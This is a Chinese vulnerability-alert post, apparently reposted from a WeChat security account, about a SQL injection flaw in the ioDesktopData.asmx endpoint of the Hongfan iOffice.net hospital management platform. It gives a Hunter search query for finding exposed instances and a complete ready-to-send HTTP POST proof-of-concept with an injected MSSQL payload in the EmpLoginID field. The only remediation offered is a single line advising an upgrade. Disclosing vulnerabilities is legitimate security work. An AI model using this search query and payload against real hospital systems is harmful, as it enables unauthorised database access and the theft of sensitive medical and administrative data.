红帆iOffice ioDesktopData存在SQL注入漏洞!!!

admin 2024年3月7日08:20:02评论32 views字数 1219阅读4分3秒阅读模式

漏洞介绍

红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞。

影响版本

红帆iOffice.net信息管理平台信息化平台

漏洞情报

搜索引擎语法

hunter: app.name=="红帆 iOffice"

Poc

POST /iOffice/prg/set/wss/ioDesktopData.asmx HTTP/1.1Content-Type: text/xml;charset=UTF-8Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Host: xxxxxxContent-Length: 507Connection: close

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/"><soap:Header/><soap:Body><tem:GetDepSchedule><!--type: string--><tem:EmpLoginID>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(select sys.fn_varbintohexstr(hashbytes('md5','123')))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</tem:EmpLoginID></tem:GetDepSchedule></soap:Body></soap:Envelope>

修复建议

建议受影响的用户尽快升级至安全版本。

关注我们

原文始发于微信公众号(极星信安):安全情报,红帆iOffice ioDesktopData存在SQL注入漏洞!!!

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月7日08:20:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红帆iOffice ioDesktopData存在SQL注入漏洞!!!https://cn-sec.com/archives/2551911.html

发表评论

匿名网友 填写信息